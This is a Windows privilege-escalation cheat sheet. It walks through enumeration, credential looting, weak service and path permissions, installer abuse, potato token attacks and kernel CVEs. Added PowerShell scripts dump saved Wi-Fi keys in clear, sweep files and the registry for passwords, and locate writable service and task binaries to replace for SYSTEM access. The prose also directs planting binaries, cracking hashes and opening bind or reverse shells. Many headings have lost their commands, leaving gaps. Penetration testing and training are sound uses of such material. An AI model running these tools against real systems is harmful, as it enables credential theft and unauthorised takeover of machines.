Windows - Privilege Escalation
Summary
Tools
Windows Version and Configuration
User Enumeration
Network Enumeration
Antivirus Enumeration
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
HiveNightmare
LAPS Settings
Search for file contents
Search for a file with a certain filename
Search the registry for key names and passwords
Passwords in unattend.xml
Wifi passwords
Sticky Notes passwords
Passwords stored in services
Passwords stored in Key Manager
Powershell History
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
EoP - Incorrect permissions in services
EoP - Windows Subsystem for Linux (WSL)
EoP - Unquoted Service Paths
EoP - $PATH Interception
EoP - Named Pipes
EoP - Kernel Exploitation
EoP - Microsoft Windows Installer
AlwaysInstallElevated
CustomActions
EoP - Insecure GUI apps
EoP - Evaluating Vulnerable Drivers
EoP - Printers
Universal Printer
Bring Your Own Vulnerability
EoP - Runas
EoP - Abusing Shadow Copies
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
EoP - Impersonation Privileges
Restore A Service Account's Privileges
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Juicy Potato (Abusing the golden privileges)
Rogue Potato (Fake OXID Resolver)
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
PrintSpoofer (Printer Bug)
EoP - Privileged File Write
DiagHub
UsoDLLLoader
WerTrigger
WerMgr
EoP - Privileged File Delete
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
MS10-015 (KiTrap0D)
MS11-080 (afd.sys)
MS15-051 (Client Copy Image)
MS16-032
MS17-010 (Eternal Blue)
CVE-2019-1388
References
Tools
Windows Version and Configuration
Extract patches and updates
Architecture
List all env variables
List all drives
User Enumeration
Get current username
List user privilege
List all users
List logon requirements (lockout threshold, lockout duration, password policy); useful before any brute force so you do not lock accounts out
Get details about a user (i.e. administrator, admin, current user)
List all local groups
Get details about a group (i.e. administrators)
Get Domain Controllers
Network Enumeration
List all network interfaces, IP, and DNS.
List current routing table
List the ARP table
List all current connections
List all network shares
SNMP Configuration
Antivirus Enumeration
Enumerate the antivirus products registered with Security Center: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName (the SecurityCenter2 namespace exists only on client editions of Windows; it is absent on Windows Server)
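The same query from PowerShell, with the productState value decoded, as an added example that is not part of the original page. The bit positions used here (0x1000 = real-time protection on, 0x10 = signatures out of date) are the community interpretation of an undocumented value, not a Microsoft contract; the Defender fallback is for servers, where the namespace does not exist.

```powershell
# Added example: enumerate registered antivirus products and decode productState.
# The bit positions below are the commonly used reading of an undocumented value.
function Get-AvProduct {
    try {
        $products = Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName 'AntivirusProduct' -ErrorAction Stop
    } catch {
        # root/SecurityCenter2 is absent on Windows Server; fall back to Defender's own cmdlet.
        $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
        if ($mp) {
            return [pscustomobject]@{
                Name     = 'Windows Defender'
                Enabled  = $mp.RealTimeProtectionEnabled
                UpToDate = ($mp.AntivirusSignatureAge -lt 7)   # days since the last signature update
                ExePath  = $null
                RawState = $null
            }
        }
        return
    }
    foreach ($p in $products) {
        $state = [int]$p.productState
        [pscustomobject]@{
            Name     = $p.displayName
            Enabled  = (($state -band 0x1000) -ne 0)   # real-time protection on
            UpToDate = (($state -band 0x10) -eq 0)     # 0x10 set = definitions outdated
            ExePath  = $p.pathToSignedProductExe
            RawState = ('0x{0:X6}' -f $state)          # e.g. 0x061100 for an enabled, current product
        }
    }
}

Get-AvProduct | Format-Table -AutoSize
```

A product listed with Enabled = False is the normal picture for Defender when a third-party engine is registered (Defender drops to passive mode); the engine that matters for payload handling is the one reporting Enabled = True.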
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
The Security Account Manager (SAM) is the database of local accounts. User passwords are stored as hashes (LM or, on any modern system, NT/NTLM; LM hashes are no longer stored by default) in the registry hive file %SystemRoot%\System32\config\SAM, which is mounted as HKLM\SAM. The hashes are encrypted with a key derived from the SYSTEM hive (the boot key), so both SAM and SYSTEM are needed to recover them. Both files are locked while Windows is running: an administrator can export them with reg save, and Volume Shadow Copies expose a readable copy (see HiveNightmare below).
Generate a hash file for John using pwdump or samdump2.
Either crack it with john --format=NT /root/sam.txt or hashcat, or use Pass-The-Hash.
HiveNightmare
CVE-2021-36934 (HiveNightmare / SeriousSAM) lets a non-administrator retrieve the registry hives (SAM, SECURITY, SYSTEM) on Windows 10 from version 1809 and on early Windows 11 builds, because the hive files in %SystemRoot%\System32\config are readable by BUILTIN\Users. The live files stay locked, so the attack needs an existing Volume Shadow Copy to read them from.
Check for the vulnerability using icacls on C:\Windows\System32\config\SAM: an entry BUILTIN\Users:(I)(RX) means the ACL is vulnerable.
Then exploit the CVE by requesting the shadow copies on the filesystem (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\) and reading the hives from there.
LAPS Settings
Extract the HKLM\Software\Policies\Microsoft Services\AdmPwd key from the Windows Registry. The values of interest:
- LAPS Enabled: AdmPwdEnabled
- LAPS Admin Account Name: AdminAccountName (absent means the built-in Administrator account is the one managed)
- LAPS Password Complexity: PasswordComplexity
- LAPS Password Length: PasswordLength
- LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
The managed password itself is not in these keys; it lives in Active Directory (ms-Mcs-AdmPwd) and is readable only by the principals delegated to it. What the local policy tells you is whether LAPS is deployed on this host and which local administrator account it rotates.
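Reading those values as a standard user, as an added example that is not from the original page. The legacy key and the CSE DLL path are the documented LAPS locations; the Windows LAPS policy path (HKLM\Software\Microsoft\Policies\LAPS) is an assumption noted in the code.

```powershell
# Added example: summarise the LAPS policy visible locally.
function Get-LapsPolicy {
    $legacy = 'HKLM:\Software\Policies\Microsoft Services\AdmPwd'   # legacy LAPS (AdmPwd CSE)
    $modern = 'HKLM:\Software\Microsoft\Policies\LAPS'              # Windows LAPS policy (assumed path)
    $complexityNames = @{ 1 = 'A-Z'; 2 = 'A-Z a-z'; 3 = 'A-Z a-z 0-9'; 4 = 'A-Z a-z 0-9 special' }

    $result = [ordered]@{
        LegacyPolicyPresent = Test-Path $legacy
        LegacyCseInstalled  = Test-Path "$env:ProgramFiles\LAPS\CSE\AdmPwd.dll"
        WindowsLapsPolicy   = Test-Path $modern
    }
    if ($result.LegacyPolicyPresent) {
        $p = Get-ItemProperty -Path $legacy
        $result.Enabled          = ($p.AdmPwdEnabled -eq 1)
        # No AdminAccountName means LAPS manages the built-in Administrator (RID 500).
        $result.ManagedAccount   = if ($p.AdminAccountName) { $p.AdminAccountName } else { 'Administrator (built-in, RID 500)' }
        $result.Complexity       = $complexityNames[[int]$p.PasswordComplexity]
        $result.Length           = $p.PasswordLength
        $result.ExpiryProtection = ($p.PwdExpirationProtectionEnabled -eq 1)
    }
    [pscustomobject]$result
}

Get-LapsPolicy
```

When the CSE DLL is installed but the policy key is missing, the host has the client side deployed without the GPO reaching it, which usually means the local administrator password is not being rotated at all.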
Search for file contents
Also search in remote places such as SMB Shares and SharePoint:
Search passwords in SharePoint: nheiniger/SnaffPoint (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6)
Search passwords in SMB Shares: SnaffCon/Snaffler
Search for a file with a certain filename
Search the registry for key names and passwords
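An added example covering the three searches above (file contents, file names by extension, registry) in PowerShell; it is not code from the original page. The roots, patterns and extensions are illustrative defaults, and the fixed registry spots checked first (Winlogon autologon, PuTTY sessions) are the classic locations rather than an exhaustive list.

```powershell
# Added example: content search over secret-bearing file types, then a registry sweep.
function Find-PasswordInFiles {
    param(
        [string[]]$Roots    = @($env:USERPROFILE, "$env:SystemDrive\inetpub", $env:ProgramData),
        [string[]]$Patterns = @('password', 'passwd', 'pwd=', 'connectionstring', 'secret'),
        [string[]]$Include  = @('*.txt','*.ini','*.config','*.xml','*.json','*.ps1','*.bat','*.cmd','*.vbs','*.yml','*.yaml','*.conf','*.log')
    )
    $regex = ($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'
    Get-ChildItem -Path $Roots -Include $Include -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 5MB } |                       # skip large logs and binaries
        Select-String -Pattern $regex -ErrorAction SilentlyContinue |
        Select-Object Path, LineNumber, @{ n = 'Match'; e = { $_.Line.Trim() } }
}

function Find-PasswordInRegistry {
    param([string[]]$Hives = @('HKCU:\', 'HKLM:\SOFTWARE'), [string]$Pattern = 'pass')
    # Fixed spots first: autologon and PuTTY saved sessions.
    $winlogon = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($winlogon.DefaultPassword) {
        [pscustomobject]@{ Key = 'Winlogon'; Name = "$($winlogon.DefaultDomainName)\$($winlogon.DefaultUserName)"; Value = $winlogon.DefaultPassword }
    }
    Get-ChildItem 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue | ForEach-Object {
        $s = Get-ItemProperty $_.PSPath
        [pscustomobject]@{ Key = $_.Name; Name = 'PuTTY session'; Value = "$($s.UserName)@$($s.HostName) proxy=$($s.ProxyUsername):$($s.ProxyPassword)" }
    }
    # Generic sweep: value names or string data matching the pattern (slow under HKLM:\SOFTWARE).
    foreach ($hive in $Hives) {
        Get-ChildItem -Path $hive -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                $data = $key.GetValue($name)
                if ($name -match $Pattern -or ($data -is [string] -and $data -match $Pattern)) {
                    [pscustomobject]@{ Key = $key.Name; Name = $name; Value = $data }
                }
            }
        }
    }
}

Find-PasswordInFiles    | Format-Table -AutoSize
Find-PasswordInRegistry | Format-Table -AutoSize
```

Keep the file search scoped: walking all of C:\ with Select-String is slow and noisy, and the user profile, web roots and ProgramData are where unprotected secrets usually sit.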
Passwords in unattend.xml
Location of the unattend.xml files.
Locate these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul, then display their content. Setup normally scrubs the password values from the copies it caches, so an intact value in a leftover file is the finding.
Example content
Unattend credentials are stored in base64 and can be decoded manually with base64. The decoded value is UTF-16LE and, when PlainText is false, carries the literal suffix "Password" that Setup appends before encoding; strip it to get the real password.
The Metasploit module post/windows/gather/enum_unattend looks for these files.
IIS Web config
Other files
Wifi passwords
Find AP SSID
Get Cleartext Pass
One-liner method to extract the Wi-Fi passwords of all saved access points.
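A language-independent version of that one-liner, added here and not from the original page: instead of scraping the localized output of netsh wlan show profiles, it exports every profile to XML with the key in clear and reads the fields back. It assumes the current user may read the profile keys (otherwise keyMaterial is simply absent from the export).

```powershell
# Added example: dump SSID, authentication and PSK for every saved WLAN profile.
function Get-WifiProfileKey {
    param([string]$ExportDir = (Join-Path $env:TEMP ('wlan_' + [guid]::NewGuid().ToString('N'))))
    New-Item -ItemType Directory -Path $ExportDir -Force | Out-Null
    try {
        # One <profile name>.xml per profile; key=clear puts the PSK into <keyMaterial>.
        $null = netsh wlan export profile folder="$ExportDir" key=clear
        foreach ($f in Get-ChildItem -Path $ExportDir -Filter '*.xml') {
            [xml]$x = Get-Content -LiteralPath $f.FullName -Raw
            $sec = $x.WLANProfile.MSM.security
            [pscustomobject]@{
                SSID   = $x.WLANProfile.name
                Auth   = $sec.authEncryption.authentication   # open, WPA2PSK, WPA2 (802.1X), WPA3SAE ...
                Cipher = $sec.authEncryption.encryption
                Key    = $sec.sharedKey.keyMaterial           # $null for open and EAP networks
            }
        }
    } finally {
        Remove-Item -LiteralPath $ExportDir -Recurse -Force -ErrorAction SilentlyContinue
    }
}

Get-WifiProfileKey | Format-Table -AutoSize
```

Enterprise (802.1X) profiles carry no PSK; for those the interesting data is the EAP configuration and any stored user credential, which this export does not include.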
Sticky Notes passwords
The Sticky Notes app stores its content in a SQLite database located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
Passwords stored in Key Manager
⚠️ This software (the Credential Manager / Key Manager dialog) displays its output in a GUI window, not on the console, so it needs an interactive desktop session.
Powershell History
PSReadLine writes every interactive command to a per-user history file; its location is (Get-PSReadlineOption).HistorySavePath, by default under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\. Disable PowerShell history for the current session with Set-PSReadlineOption -HistorySaveStyle SaveNothing.
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
What processes are running?
Which processes are running as "system"
Do you have powershell magic?
List installed programs
List services
Enumerate scheduled tasks
Startup tasks
EoP - Incorrect permissions in services
A service running as Administrator/SYSTEM whose binary (or the directory holding it) has weak file permissions allows EoP: replace the binary, restart the service (or wait for a reboot if you are not allowed to restart it) and get SYSTEM.
Often, services point to writable locations:
- Orphaned installs, not installed anymore but still present in startup
- DLL hijacking
- PATH directories with weak permissions
Alternatively you can use the Metasploit exploit: exploit/windows/local/service_permissions
Note: to check file permissions you can use cacls and icacls: icacls (Windows Vista and later), cacls (Windows XP).
You are looking for BUILTIN\Users:(F) (Full access), BUILTIN\Users:(M) (Modify access) or BUILTIN\Users:(W) (Write-only access) in the output. Also check the service object's own DACL (accesschk -c, or sc sdshow): SERVICE_CHANGE_CONFIG on the service lets you repoint binPath without touching the file at all.
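An added example, not from the original page, that automates the file-permission side of this check for service binaries and for scheduled-task actions (the processes-and-tasks enumeration above), since both run as a fixed account and both are replaced the same way. The identity list and the right mask are the usual "anyone can write here" markers; extend them for the target's own groups.

```powershell
# Added example: service binaries and task actions whose file or parent directory is writable
# by low-privileged principals.
$WeakIdentities = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE',
                    "$env:USERDOMAIN\$env:USERNAME")
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, DeleteSubdirectoriesAndFiles'

function Get-ImageExecutable {
    # Pull the executable out of 'C:\path\svc.exe -arg' or '"C:\path with space\svc.exe" -arg'.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        return $(if ($end -gt 1) { $cmd.Substring(1, $end - 1) } else { $cmd.Trim('"') })
    }
    $m = [regex]::Match($cmd, '^(.+?\.(exe|dll|sys|bat|cmd|ps1))(\s|$)', 'IgnoreCase')
    return $(if ($m.Success) { $m.Groups[1].Value } else { ($cmd -split '\s+')[0] })
}

function Get-WeakAce {
    # Allow ACEs on $Path granting a weak identity a write-like or ownership right.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @(foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakIdentities -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        # 0x10000000 = GENERIC_ALL, 0x40000000 = GENERIC_WRITE (show up on inherited ACEs)
        if (($rights -band $WriteMask) -ne 0 -or ($rights -band 0x10000000) -ne 0 -or ($rights -band 0x40000000) -ne 0) {
            "$($ace.IdentityReference): $($ace.FileSystemRights)"
        }
    })
}

function Find-WritableServiceBinary {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $exe = Get-ImageExecutable $_.PathName
        if (-not $exe) { return }
        $onFile = Get-WeakAce $exe
        $onDir  = Get-WeakAce (Split-Path -Parent $exe)
        if ($onFile.Count -or $onDir.Count) {
            [pscustomobject]@{ Kind = 'Service'; Name = $_.Name; RunAs = $_.StartName; StartMode = $_.StartMode
                               Path = $exe; FileAces = ($onFile -join '; '); DirAces = ($onDir -join '; ') }
        }
    }
}

function Find-WritableTaskBinary {
    Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions have no Execute
            $exe = Get-ImageExecutable $action.Execute
            if (-not $exe) { continue }
            $onFile = Get-WeakAce $exe
            $onDir  = Get-WeakAce (Split-Path -Parent $exe)
            if ($onFile.Count -or $onDir.Count) {
                [pscustomobject]@{ Kind = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"; RunAs = $task.Principal.UserId
                                   StartMode = $task.State; Path = $exe; FileAces = ($onFile -join '; '); DirAces = ($onDir -join '; ') }
            }
        }
    }
}

@(Find-WritableServiceBinary) + @(Find-WritableTaskBinary) | Format-Table -AutoSize
```

A writable parent directory with a non-writable file is still interesting: Delete or DeleteSubdirectoriesAndFiles on the directory lets you rename the original aside and drop your own binary under the expected name.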
Example with Windows 10 - CVE-2019-1322 UsoSvc
Prerequisite: Service account
Example with Windows XP SP1 - upnphost
If it fails because of a missing dependency, try the following commands.
Using accesschk from Sysinternals, or accesschk-XP.exe (github.com/phackt) on Windows XP.
EoP - Windows Subsystem for Linux (WSL)
Technique borrowed from Warlockobama's tweet.
With root privileges inside Windows Subsystem for Linux (WSL), a user can create a bind shell on any port (no elevation needed). Don't know the root password? No problem, just set the default user to root with the distribution launcher: <distro>.exe --default-user root. Now start your bind shell or reverse shell. Note that root inside WSL still runs under the Windows user's token, so this buys a convenient listener and filesystem access, not Windows privileges.
The binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Alternatively you can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
EoP - Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. Every Windows service has a path to its executable. If that path is unquoted and contains whitespace, CreateProcess treats each space as a possible end of the executable name and tries the shorter candidates first, so a writable directory along the path lets you plant a binary that runs as the service account.
Metasploit exploit: exploit/windows/local/trusted_service_path
PowerUp exploit
Example
For C:\Program Files\Some Folder\legit.exe, Windows will try the following paths first:
C:\Program.exe
C:\Program Files\Some.exe
Standard users cannot create files at the root of C:\ (only folders), so the C:\Program.exe candidate is rarely usable; the interesting candidates are deeper directories with loose DACLs.
EoP - $PATH Interception
Requirements:
- PATH contains a folder writable by a low-privileged user.
- The writable folder comes before the folder that contains the legitimate binary.
Example:
Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe" by bare name through a PATH lookup (typing cmd in a shell, a script calling it without a full path), our evil version in the nodejs folder runs instead of the legitimate one in the system32 folder. CreateProcess itself searches the application directory and System32 before PATH, so programs that launch cmd.exe by full path or through that search order are unaffected. The machine-wide PATH (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment) is the one services and other users inherit, which is what makes a writable entry there an escalation rather than a self-hijack.
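An added example, not from the original page, serving both the unquoted-service-path section and the PATH-interception section above: both reduce to "is a directory Windows consults before the real binary writable by me?". The writability test creates and removes a probe file, so it reflects the effective token rather than a DACL reading; the target name cm d.exe in Find-PathInterception is only a default.

```powershell
# Added example: enumerate CreateProcess candidates for unquoted service paths and writable
# PATH entries that precede the legitimate binary.
function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('~' + [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-UnquotedPathCandidate {
    # CreateProcess tries every space-delimited prefix of an unquoted path, appending .exe
    # when the prefix has no extension, before reaching the intended file.
    param([string]$ExePath)
    $cands = @()
    $idx = $ExePath.IndexOf(' ')
    while ($idx -gt 0) {
        $prefix = $ExePath.Substring(0, $idx)
        $cand = if ([IO.Path]::GetExtension($prefix)) { $prefix } else { "$prefix.exe" }
        $cands += $cand
        $idx = $ExePath.IndexOf(' ', $idx + 1)
    }
    return $cands
}

function Find-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and -not $_.PathName.StartsWith('"') } |
        ForEach-Object {
            # Strip arguments: keep everything up to the first .exe token.
            $exe = if ($_.PathName -match '^(.+?\.exe)(\s|$)') { $Matches[1] } else { $_.PathName }
            if ($exe -notmatch ' ') { return }
            foreach ($cand in Get-UnquotedPathCandidate $exe) {
                [pscustomobject]@{
                    Service   = $_.Name
                    RunAs     = $_.StartName
                    StartMode = $_.StartMode
                    Candidate = $cand
                    # C:\ lets standard users create folders but not files, so C:\Program.exe is usually a dead end.
                    Writable  = Test-DirectoryWritable (Split-Path -Parent $cand)
                }
            }
        }
}

function Find-PathInterception {
    # $Target is resolved through PATH (cmd's command search, scripts, Start-Process by bare name).
    # Scope 'Machine' reads the registry PATH that services and other users inherit.
    param([string]$Target = 'cmd.exe', [string]$Scope = 'Process')
    $dirs = @([Environment]::GetEnvironmentVariable('PATH', $Scope) -split ';' |
        Where-Object { $_ } | ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim().Trim('"')) })
    $legit = -1
    for ($i = 0; $i -lt $dirs.Count; $i++) {
        if (Test-Path -LiteralPath (Join-Path $dirs[$i] $Target)) { $legit = $i; break }
    }
    for ($i = 0; $i -lt $dirs.Count; $i++) {
        [pscustomobject]@{
            Position    = $i
            Directory   = $dirs[$i]
            Writable    = Test-DirectoryWritable $dirs[$i]
            BeforeLegit = ($legit -ge 0 -and $i -lt $legit)   # Writable + BeforeLegit = interception position
        }
    }
}

Find-UnquotedServicePath | Where-Object { $_.Writable } | Format-Table -AutoSize
Find-PathInterception -Scope Machine | Where-Object { $_.Writable -and $_.BeforeLegit }
```

For the service case, also look at StartMode and RunAs: an Auto service running as LocalSystem with a writable candidate directory is the full chain, while a Manual service you cannot start yourself only fires on the next reboot or when something else starts it.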
EoP - Named Pipes
Find named pipes: [System.IO.Directory]::GetFiles("\\.\pipe\")
Check a named pipe's DACL: pipesec.exe <named_pipe>
Reverse engineer the software behind the pipe to learn what messages it accepts and what it does with them as its privileged account.
Send data through the named pipe: program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
EoP - Kernel Exploitation
List of kernel exploits: https://github.com/SecWiki/windows-kernel-exploits
Security Bulletin / KB / Description / Operating System
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2012/2008)
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2012/2008)
CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
MS17-010 [KB4013389] [SMBv1 Remote Code Execution (EternalBlue)] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS16-014 [KB3134228] [remote code execution] (2008/Vista/7) ...
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (NT/2000/XP/2003)
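An added example, not from the original page, that turns the bulletin-to-KB pairs in the table above into an installed-patch check (the same test the MS16-032 entry below does by hand with wmic qfe). A missing KB is a lead, not proof: on Windows 10 and later the cumulative updates supersede these KBs without listing them, so there the OS build number is what to compare.

```powershell
# Added example: which table KBs are present in the installed hotfix list.
function Test-KernelPatch {
    param([hashtable]$Bulletins = @{
        'MS17-017' = 'KB4013081'; 'MS17-010' = 'KB4013389'; 'MS16-135' = 'KB3199135'
        'MS16-111' = 'KB3186973'; 'MS16-098' = 'KB3178466'; 'MS16-075' = 'KB3164038'
        'MS16-034' = 'KB3143145'; 'MS16-032' = 'KB3143141'; 'MS16-016' = 'KB3136041'
        'MS16-014' = 'KB3134228'; 'MS03-026' = 'KB823980'
    })
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue | ForEach-Object { $_.HotFixID })
    # Windows 10 / Server 2016 and later (build 10240+) ship cumulative updates: the individual KB
    # numbers above never appear, so the result there says only "compare the build level".
    $cumulative = ([int]$os.BuildNumber -ge 10240)
    $note = if ($cumulative) { "build $($os.BuildNumber): compare against the cumulative update level" } else { '' }
    foreach ($b in ($Bulletins.Keys | Sort-Object)) {
        [pscustomobject]@{
            Bulletin  = $b
            KB        = $Bulletins[$b]
            Installed = ($installed -contains $Bulletins[$b])
            Note      = $note
        }
    }
}

$os = Get-CimInstance -ClassName Win32_OperatingSystem
"$($os.Caption) build $($os.BuildNumber) $env:PROCESSOR_ARCHITECTURE"
Test-KernelPatch | Format-Table -AutoSize
```

Pair the output with the OS line printed first: an exploit from the table is only a candidate when the bulletin's affected-version list includes that OS and the KB is genuinely absent rather than superseded.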
To cross compile a program from Kali, use the mingw-w64 cross compiler with the following command.
EoP - Microsoft Windows Installer
AlwaysInstallElevated
Using the reg query command, you can check the status of the AlwaysInstallElevated value (SOFTWARE\Policies\Microsoft\Windows\Installer) under both HKLM and HKCU. If both queries return a value of 0x1, AlwaysInstallElevated is enabled for both user and machine and any MSI a standard user installs runs its install sequence as SYSTEM, indicating the system is vulnerable. One of the two set alone is not enough: msiexec ignores the setting unless both agree.
Shell command
PowerShell command
Then create an MSI package and install it.
Technique also available in:
- Metasploit: exploit/windows/local/always_install_elevated
- PowerUp.ps1: Get-RegistryAlwaysInstallElevated, Write-UserAddMSI
CustomActions
Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation. Deferred custom actions run in the context of the Windows Installer service (SYSTEM), which is what the repair trick below relies on.
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file.
Enumerate products on the machine
Execute the repair process with the /fa parameter to trigger the CustomActions. You can use either the IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1} or the path to the cached installer c:\windows\installer\XXXXXXX.msi. The repair can be started by a standard user, and its deferred custom actions run as NT AUTHORITY\SYSTEM.
Common mistakes in MSI installers:
- Missing quiet parameters: it will spawn conhost.exe as NT SYSTEM. Use [CTRL]+[A] to select some text in it, which pauses the execution. Then: conhost -> properties -> "legacy console mode" link -> Internet Explorer -> CTRL+O -> cmd.exe
- GUI with direct actions: open a URL and start the browser, then use the same scenario.
- Binaries/Scripts loaded from user-writable paths: you might need to win the race condition.
- DLL hijacking / search order abuse
- PowerShell -NoProfile missing: add custom commands into your profile
EoP - Insecure GUI apps
An application running as SYSTEM that lets a user spawn a CMD or browse directories (help links, file dialogs, "open with" prompts).
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
EoP - Evaluating Vulnerable Drivers
Look for vulnerable drivers loaded; we often don't spend enough time looking at this:
Living Off The Land Drivers (https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.
Native binary: driverquery.exe /v (or driverquery /si for signature information); compare the loaded driver names and file hashes against the LOLDrivers list.
EoP - Printers
Universal Printer
Create a Printer
Execute the driver
PrintNightmare (CVE-2021-34527)
Bring Your Own Vulnerability
Concealed Position : https://github.com/jacob-baines/concealed_position
ACIDDAMAGE - CVE-2021-35449 - Lexmark Universal Print Driver LPE
RADIANTDAMAGE - CVE-2021-38085 - Canon TR150 Print Driver LPE
POISONDAMAGE - CVE-2019-19363 - Ricoh PCL6 Print Driver LPE
SLASHINGDAMAGE - CVE-2020-1300 - Windows Print Spooler LPE
EoP - Runas
Use cmdkey to list the stored credentials on the machine.
Then you can use runas with the /savecred option to run a program under the saved credentials. The following example calls a remote binary via an SMB share.
Using runas with a provided set of credentials.
EoP - Abusing Shadow Copies
If you have local administrator access on a machine, try to list shadow copies: they give a readable copy of files that are locked on the live system (SAM, SYSTEM, NTDS.dit on a domain controller), which is an easy path to credential material and from there to other hosts or to SYSTEM.
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (and also Libraries): https://lolbas-project.github.io/
The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
A LOLBin/Lib/Script must:
- Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
- Have extra "unexpected" functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses.
- Have functionality that would be useful to an APT or red team.
EoP - Impersonation Privileges
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool | "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe" | Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon. |
